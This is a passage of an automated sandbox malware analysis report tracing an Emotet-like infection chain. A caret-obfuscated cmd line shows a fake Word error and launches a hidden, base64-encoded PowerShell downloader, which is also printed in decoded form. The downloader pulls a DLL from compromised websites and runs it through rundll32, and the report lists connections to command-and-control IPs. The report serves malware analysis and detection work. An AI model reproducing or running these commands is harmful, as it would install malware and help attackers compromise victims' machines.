                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2828Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                      Source: rundll32.exe, 00000008.00000002.2124359207.00000000006A0000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001D4D mov eax, dword ptr fs:[00000030h]7_2_10001D4D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory protected: page execute read | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 51.255.203.164 144
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 84.232.229.24 80
                      Encrypted powershell cmdline option foundShow sources
                      Source: unknownProcess created: Base64 decoded SET-iTeM varIaBLE:PGB ( [TYPe]("{2}{4}{5}{1}{0}{3}" -f'.Dir','m.IO','Sy','ECToRy','St','E')); sET ('29x'+'d'+'4M') ( [TYpE]("{7}{1}{2}{3}{6}{4}{0}{5}" -f'Na','ys','TeM.NEt','.SErVi','ePOinTmA','GeR','C','s') );$Xjb6uu9=$S_7W + [char](64) + $C96Z;$A29Y=(('T'+'65')+'Q'); $pgB::"cr`EaT`eDIr`Ect`oRy"($HOME + (('db'+('zVl'+'j0ta0d')+'bz'+('M'+'tkd4'+'y0')+('db'+'z'))."r`E`PLAce"(([cHaR]100+[cHaR]98+[cHaR]122),'\')));$X13H=(('T'+'66')+'L'); (VaRiABLe ('29x'+'d'+'4M') ).VALue::"SeCUR`ITY`P`R`OTOCOL" = ('Tl'+('s'+'12'));$E34Q=(('Q_'+'1')+'L');$I3laa23 = (('O8'+'_')+'N');$W96Y=(('P'+'51')+'D');$Iq6rfg0=$HOME+((('o'+'6nV')+('lj0t'+'a0o')+'6n'+'Mt'+('kd'+'4')+('y'+'0o6')+'n')-crEPlACE ([chAr]111+[chAr]54+[chAr]110),[chAr]92)+$I3laa23+('.'+('dl'+'l'));$S84B=('O'+('32'+'I'));$Ozx9xkd=('s'+'g'+(' yw'+' a'+'h'+':'+'//riandut')+('r'+'a.com/e')+'m'+'a'+('il/'+'A'+'fhE8z0/')+('@s'+'g yw')+(' a'+'h:')+'//'+'c'+('al'+'le'+'dtoch'+'a')+('nge'+'.org'+'/C')+'a'+('l'+'ledt')+'o'+'C'+'h'+('an'+'g')+('e/8huS'+'O'+'d/')+('@s'+'g yw')+(' ah'+'s:/'+'/m'+'rveggy.c'+'om/wp-admi'+'n')+('/'+'n/@')+'s'+('g yw'+' a')+'h'+'s'+(':'+'//n')+('orail'+'y')+'a'+('.'+'co'+'m/dr')+'up'+('al'+'/')+('r'+'etA')+'l'+('/'+'@sg')+' y'+('w ahs:'+'/')+'/'+('hbprivi'+'l'+'e'+'g')+'e'+'d.'+'co'+('m/cg'+'i-bin'+'/Qg')+('/@s'+'g y'+'w')+(' '+'ahs')+':'+'//'+'u'+'mm'+('ahstar'+'s.'+'com')+'/'+('ap'+'p_')+'o'+('ld_'+'m')+('ay_'+'2')+'0'+('18'+'/')+('as'+'sets')+('/'+'wDL8'+'x')+'/'+('@s'+'g ')+('y'+'w ')+('ah'+'s')+'
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded SET-iTeM varIaBLE:PGB ( [TYPe]("{2}{4}{5}{1}{0}{3}" -f'.Dir','m.IO','Sy','ECToRy','St','E')); sET ('29x'+'d'+'4M') ( [TYpE]("{7}{1}{2}{3}{6}{4}{0}{5}" -f'Na','ys','TeM.NEt','.SErVi','ePOinTmA','GeR','C','s') );$Xjb6uu9=$S_7W + [char](64) + $C96Z;$A29Y=(('T'+'65')+'Q'); $pgB::"cr`EaT`eDIr`Ect`oRy"($HOME + (('db'+('zVl'+'j0ta0d')+'bz'+('M'+'tkd4'+'y0')+('db'+'z'))."r`E`PLAce"(([cHaR]100+[cHaR]98+[cHaR]122),'\')));$X13H=(('T'+'66')+'L'); (VaRiABLe ('29x'+'d'+'4M') ).VALue::"SeCUR`ITY`P`R`OTOCOL" = ('Tl'+('s'+'12'));$E34Q=(('Q_'+'1')+'L');$I3laa23 = (('O8'+'_')+'N');$W96Y=(('P'+'51')+'D');$Iq6rfg0=$HOME+((('o'+'6nV')+('lj0t'+'a0o')+'6n'+'Mt'+('kd'+'4')+('y'+'0o6')+'n')-crEPlACE ([chAr]111+[chAr]54+[chAr]110),[chAr]92)+$I3laa23+('.'+('dl'+'l'));$S84B=('O'+('32'+'I'));$Ozx9xkd=('s'+'g'+(' yw'+' a'+'h'+':'+'//riandut')+('r'+'a.com/e')+'m'+'a'+('il/'+'A'+'fhE8z0/')+('@s'+'g yw')+(' a'+'h:')+'//'+'c'+('al'+'le'+'dtoch'+'a')+('nge'+'.org'+'/C')+'a'+('l'+'ledt')+'o'+'C'+'h'+('an'+'g')+('e/8huS'+'O'+'d/')+('@s'+'g yw')+(' ah'+'s:/'+'/m'+'rveggy.c'+'om/wp-admi'+'n')+('/'+'n/@')+'s'+('g yw'+' a')+'h'+'s'+(':'+'//n')+('orail'+'y')+'a'+('.'+'co'+'m/dr')+'up'+('al'+'/')+('r'+'etA')+'l'+('/'+'@sg')+' y'+('w ahs:'+'/')+'/'+('hbprivi'+'l'+'e'+'g')+'e'+'d.'+'co'+('m/cg'+'i-bin'+'/Qg')+('/@s'+'g y'+'w')+(' '+'ahs')+':'+'//'+'u'+'mm'+('ahstar'+'s.'+'com')+'/'+('ap'+'p_')+'o'+('ld_'+'m')+('ay_'+'2')+'0'+('18'+'/')+('as'+'sets')+('/'+'wDL8'+'x')+'/'+('@s'+'g ')+('y'+'w ')+('ah'+'s')+'Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAACJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogAJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogAJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',UzhgGODQuLxptXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',KezaJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',TsvDubJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',ujMkapeydjSFMoJJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',ANiwQWggqJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',#1
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcA
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAAC
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnAC